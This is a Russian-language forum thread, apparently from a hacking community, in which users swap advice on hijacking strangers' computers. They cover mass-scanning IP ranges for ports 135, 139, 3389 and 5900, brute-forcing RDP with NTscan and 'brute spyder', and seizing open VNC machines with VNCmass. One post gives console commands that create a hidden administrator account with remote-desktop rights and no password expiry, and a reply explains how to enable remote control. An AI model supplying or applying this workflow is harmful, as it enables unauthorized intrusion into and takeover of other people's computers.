помогите разобраться. я задал диапазон ипов , затем начекал всё на порт 139,135 , потом полученный список ипов сканирую на открытость порта 3389 . Затем , если что-то останется пробую сбрутить NTscan (ом) . так ?
Почему нет - галочка на 'HOST FILE' и кнопа 'OPEN' Как то у тебя всё сложно. Если это VNC то чекать диапазон ты должен на 5900 порт, а если NT Scan то сканируешь на 3389 порт. Хотя я написал свою софтину для парсинга всех найденных VNC машин и запихиваю его в NT Scan.
Не чего не мешает просто моё имхо =) если не хочешь чтобы твой дед в последствии попал еще кому то из за лёгкого пасса , или такого ж словаря как у тебя то лучше иметь индивидуальный словарь .
Сегодня в первые искал дедиков, пошол по второму вариату на 5900 порт. скан шустрый с первого поста) VNCmass подрубил а он сразу и приконектился. Сразу в консоль прописывать cmd net user user pass /add net localgroup Administrators user /add net localgroup "Remote Desktop Users" user /add net accounts /maxpwage:unlimited exit как я понял net user user pass - это добавить user С лигоном и пасом какимто /add После всех строк, пробую приканектится удалёлкай, не получается. Опять залажу по VNCmass, и тут вижу ву галке такую же иконку VNCmass. Захожу в неё, вижу табличку где мона сменить пас на хз что. Только хочу поменять как Появляется Второй курсор И лезит всё сразу закрывать)) ОMG Как-же создавать себе утечку? Не только через консоль? И что это было) А статью всетаки стоила бы переписать!
как правильно юзать VNCmass? запускаю первый файл, загружаю туда насканеные на 5900 порт айпишники, потом жму start и открывается туева хуча окон О_о. что я делаю не так? и еще: как юзать brute spyder?
ВНЦ перехватывает сессию другого юзера который щас за компом. Если юзера не было и у тебя получилось добавить нового админчега значит тебе повезло что бы приконнектится через рдп тебе нада поставить галку на разрешении управления компом удаленно